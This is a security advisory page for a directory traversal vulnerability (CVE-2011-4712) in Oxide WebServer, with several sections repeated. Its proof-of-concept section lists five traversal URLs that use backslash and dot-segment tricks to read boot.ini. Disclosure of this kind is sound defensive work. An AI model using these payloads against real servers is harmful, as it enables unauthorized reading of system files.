Oxide WebServer Directory Traversal Vulnerability
BID:50845
Info
Oxide WebServer Directory Traversal Vulnerability
| Bugtraq ID: | 50845 |
| Class: | Input Validation Error |
| CVE: |
CVE-2011-4712 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 29 2011 12:00AM |
| Updated: | Dec 13 2011 06:28PM |
| Credit: | demonalex |
| Vulnerable: |
Oxide WebServer Oxide WebServer 0 |
| Not Vulnerable: | |
Discussion
Oxide WebServer Directory Traversal Vulnerability
Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
Oxide WebServer is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input submitted to its web interface.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the webserver. Information harvested may aid in launching further attacks.
Exploit / POC
Oxide WebServer Directory Traversal Vulnerability
An attacker can exploit this issue with a web browser.
The following example URLs are available:
http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\\..\\..\\boot.ini
http://www.example.com/..\/..\/..\/boot.ini
http://www.example.com//..\/..\/..\boot.ini
http://www.example.com/.\..\.\..\.\..\boot.ini
An attacker can exploit this issue with a web browser.
The following example URLs are available:
http://www.example.com/..\..\..\boot.ini
http://www.example.com/..\\..\\..\\boot.ini
http://www.example.com/..\/..\/..\/boot.ini
http://www.example.com//..\/..\/..\boot.ini
http://www.example.com/.\..\.\..\.\..\boot.ini
Solution / Fix
Oxide WebServer Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Oxide WebServer Directory Traversal Vulnerability
References:
References: